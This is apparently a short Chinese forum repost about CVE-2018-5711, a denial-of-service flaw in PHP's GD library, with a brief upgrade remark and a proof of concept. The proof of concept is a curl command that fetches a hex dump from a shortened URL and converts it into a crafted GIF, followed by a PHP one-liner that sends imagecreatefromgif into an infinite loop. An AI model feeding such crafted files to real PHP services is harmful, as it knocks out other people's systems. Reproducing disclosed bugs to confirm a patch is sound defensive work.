CVE-2018-5711:PHP GD库拒绝服务漏洞
http://i2.运维网.com/images/blog/201802/08/70dec708fc17ee2701168b27dea8a8fc.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=阿里云发布的PHP高危漏洞
这肯定要修补啊,官方解决方案就是升级到最新版
升级过程就不说了
编译----安装
期间各种BUG,很恶心
事后,觉得这漏洞还挺好,就给大家转载下
有时间的可以自己测试下
不要捣蛋哦,小朋友们
PoC
下载捣蛋文件
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
本机函数测试
$ php -r 'imagecreatefromgif("poc.gif");'
结果自循环,请使用ctrl+c
Infinite loop here...
页:
[1]